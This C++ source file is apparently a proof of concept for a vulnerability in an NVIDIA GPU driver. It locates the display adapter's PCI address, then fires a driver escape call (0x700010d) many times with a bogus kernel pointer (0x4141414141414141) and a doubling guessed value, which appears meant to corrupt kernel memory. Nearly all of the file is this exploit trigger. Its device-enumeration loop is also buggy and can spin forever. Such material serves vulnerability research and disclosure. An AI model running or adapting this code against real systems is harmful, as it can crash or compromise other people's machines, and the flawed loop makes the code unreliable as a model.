// gpu_poc.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <windows.h>
#include <setupapi.h>

#include <initguid.h>
DEFINE_GUID(GUID_DEVCLASS_DISPLAY, 0x4D36E968, 0xE325, 0x11CE, 0xBF, 0xC1, 0x08, 0x00, 0x2B, 0xE1, 0x03, 0x18);

#include "Gpu.h"

struct Escape700010DData {
	DWORD device_bdfs[64];
  DWORD unknown_1[64];
	DWORD unknown_2;
	DWORD size;
	uintptr_t user_ptr;
	DWORD unknown_3[64];
};

using Escape700010D = NvEscape<Escape700010DData>;

static_assert(sizeof(Escape700010D) == 0x340, "escape size");

DWORD GetNvidiaBdf() {
  HDEVINFO dev_info = SetupDiGetClassDevs(
    &GUID_DEVCLASS_DISPLAY,
    nullptr,
    nullptr,
    DIGCF_PRESENT);
  
  if (dev_info == INVALID_HANDLE_VALUE) {
    return 0;
  }

  SP_DEVICE_INTERFACE_DATA interface_data;
  DWORD index = 0;
  interface_data.cbSize = sizeof(interface_data);

  SP_DEVINFO_DATA data;
  data.cbSize = sizeof(SP_DEVINFO_DATA);
  while (SetupDiEnumDeviceInfo(dev_info, index, &data)) {
    DWORD bus;
    if (!SetupDiGetDeviceRegistryProperty(dev_info, &data, SPDRP_BUSNUMBER,
                                          nullptr, reinterpret_cast<PBYTE>(&bus),
                                          sizeof(bus), nullptr)) {
      continue;
    }

    DWORD address;
    if (!SetupDiGetDeviceRegistryProperty(dev_info, &data, SPDRP_ADDRESS,
      nullptr, reinterpret_cast<PBYTE>(&address),
      sizeof(bus), nullptr)) {
      continue;
    }

    DWORD function = address & 0xffff;
    DWORD device = address >> 16;

    // not entirely sure about the order here.
    return bus << 8 | device << 4 | function;
    ++index;
  }

  return 1;
}

int main() { 
	Gpu gpu;
	if (!gpu.Init()) {
		fprintf(stderr, "Failed to init gpu.\n");
		return 1;
	}

  Escape700010D escape(0x700010d, 0x4e562a2a);
  escape.data.user_ptr = 0x4141414141414141LLU;
  escape.data.size = 1;
  escape.data.device_bdfs[0] = GetNvidiaBdf();

  if (!escape.data.device_bdfs[0]) {
    fprintf(stderr, "Failed to find bus device function for gpu.\n");
    return 1;
  }

  DWORD guess = 0x100;
  while (guess) {
    escape.data.unknown_1[0] = guess;

    escape.data.unknown_2 = 0;
    if (gpu.Escape(&escape, sizeof(escape))) {
      fprintf(stderr, "Escape failed.\n");
    }

    escape.data.unknown_2 = 1;
    if (gpu.Escape(&escape, sizeof(escape))) {
      fprintf(stderr, "Escape failed.\n");
    }

    guess *= 2;
  }

	return 0;
}

